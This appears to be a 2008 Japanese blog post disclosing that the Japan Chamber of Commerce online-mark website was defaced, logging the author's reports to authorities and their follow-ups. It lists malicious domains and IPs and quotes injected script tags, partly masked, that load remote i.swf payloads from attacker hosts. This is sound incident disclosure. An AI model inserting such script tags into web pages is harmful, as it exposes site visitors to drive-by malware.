Semantic Web – WordPress

日本商工会議所オンラインマークの改ざん

leave a comment »

日本商工会議所オンラインマーク総合センター
 http://mark.cin.or.jp/
のオンラインマークが改ざんされており、
ページに不正なスクリプトが埋め込まれています。
マーク使用許可事業者の「オンラインマークの認証関係情報
 商工会議所オンラインマーク地域センターへのリンク中および地域センターの所在地の右端に挿入されています。
ユーザーのシステムに脆弱性があると、このコードによって実行可能ファイルが実行され、マルウェアがダウンロードされるかもしれません。オンラインマークは絶対にクリックしないで下さい。
2008-10-05 7 p.m.

ホームページの不正アクセスと改竄について下記へ連絡しました。

日本商工会議所オンラインマーク総合センター
  メール連絡済 (第一報 Sun, 05 Oct 2008 12:05:51 +0900)
  電話連絡済

情報処理推進機構(IPA)セキュリティセンター(ISEC)
 http://www.ipa.go.jp/security/ciadr/index.html
  留守電メッセージ済
  メール連絡済 (受理 2008-10-06 ca 3 p.m.)

都道府県警察本部のサイバー犯罪相談窓口
 http://www.npa.go.jp/cyber/soudan.htm
  警視庁  長時間電話中で連絡不可
  地元警察本部 電話で情報提供済

JPCERTコーディネーションセンター(JPCERT/CC)
 http://www.jpcert.or.jp/
  メール連絡済(受理 2008-10-06 11 a.m.)

[調査結果]
日本商工会議所オンラインマーク総合センター
オンラインマークの改ざんにより不正に挿入されているドメイン名
2008-10-07時点で、赤矢印の位置の"水平線"は表示されなくなりましたが、不正スクリプトは存在します。
サイト要素の不正スクリプト
drmyy.cn (2008-10-05 4 p.m. 時点の対応グロ-バルIP 211.154.163.43)
 http://safeweb.norton.com/report/show?url=drmyy.cn&x=0&y=0
 http://www.siteadvisor.com/sites/drmyy.cn/summary/

日本商工会議所オンラインマーク総合センターのサイト要素
に含まれていると思われるIPアドレス
  ブラウザ Google Chrome (現時点での最新バージョン 0.2.149.30) BETAによる警告メッセージより
HomepageTampering 081005
125.68.57.154 (2008-10-05 4 p.m. 時点の対応ドメイン ytgw123.cn)
 http://safeweb.norton.com/report/show?url=ytgw123.cn&x=0&y=0
 http://www.siteadvisor.com/sites/ytgw123.cn

 

[追記 2008-10-06]
地元の商工会議所へ電話連絡済

オンラインマークの認証関係情報
 http://mark.cin.or.jp/database/cert-plug-inst.asp?markid=A00000-*-**
2008-10-06 10 p.m. 時点で未対応です。

[追記 2008-10-07]
不正スクリプトは削除されていません。
存在場所を示す"水平線"が表示されないように、サーバ内部で「改悪」処理が行われています。ブラウザで見た人は、不正スクリプトの要素に全く気づきません。
参照ページ:
「SQLインジェクションの仕組み――Webサイトに悪質コードを埋め込む」
 http://itpro.nikkeibp.co.jp/article/COLUMN/20080930/315826/

改ざんの前後でWebサイトの外見が変化することはほとんどない。そのため,エンドユーザーが一見して改ざんに気づくことは難しい。
例外的に,HTML出力時にデータを(投稿者注:改ざん防止対策として)エスケープ処理していたり,タイトル・タグとなるデータが改ざんされたりした場合は,〈script src=http://www.example.com/ngg.js〉〈/script〉といったタグが文字列としてWebサイトに表示されることがある。

不正スクリプトは削除されました。9 p.m.

急 告再び、サーバ乗っ取り?によるオンライン認証関連情報ページの改ざん発見
2008-11-23 午前1時
閲覧者アクセスや検索ロボットの不正サイト登録を予防するため、一部***に変更しました。

【認証機関】日本<script src=http://61.31.***.114/i.swf></script><script src=http://****.co.kr/i.swf></script><script src=http://****.co.kr/i.swf></script>商工会議所オンラインマーク地域センター<br>〒100-0005 千代田区丸の内3-2-2<script src=http://61.31.***.114/i.swf></script><script src=http://****.co.kr/i.swf></script><script src=http://****.co.kr/i.swf></script>

同様の手口ですが、誘導するサイトが前回と異なります。

サイト要素の不正スクリプト
t**-n** (2008-11-23 9 a.m. 時点の対応グロ-バルIP 61.31.235.114)
Viruses Severity: High
 http://safeweb.norton.com/report/show?url=61.31.235.114&x=0&y=0
 http://www.siteadvisor.com/sites/61.31.235.114/summary/

ipkn.co.kr/i.swf (2008-11-23 9 a.m. 時点の対応グロ-バルIP 211.***.62.32)
 http://safeweb.norton.com/report/show?url=ipkn.co.kri/
 http://www.siteadvisor.com/sites/ipkn.co.kri/

  ブラウザ Google Chrome (現時点での最新バージョン 0.3.154.9) BETAによる警告メッセージより
2ndchrome081123.png

 

[追記 2008-11-27] 本日 10 a.m. 当該ページの不正スクリプト削除済確認

Written by support

2008/10/05 @ 19:10

コメントを残す

以下に詳細を記入するか、アイコンをクリックしてログインしてください。

WordPress.com ロゴ

WordPress.com アカウントを使ってコメントしています。 ログアウト / 変更 )

Twitter 画像

Twitter アカウントを使ってコメントしています。 ログアウト / 変更 )

Facebook の写真

Facebook アカウントを使ってコメントしています。 ログアウト / 変更 )

Google+ フォト

Google+ アカウントを使ってコメントしています。 ログアウト / 変更 )

%s と連携中

%d人のブロガーが「いいね」をつけました。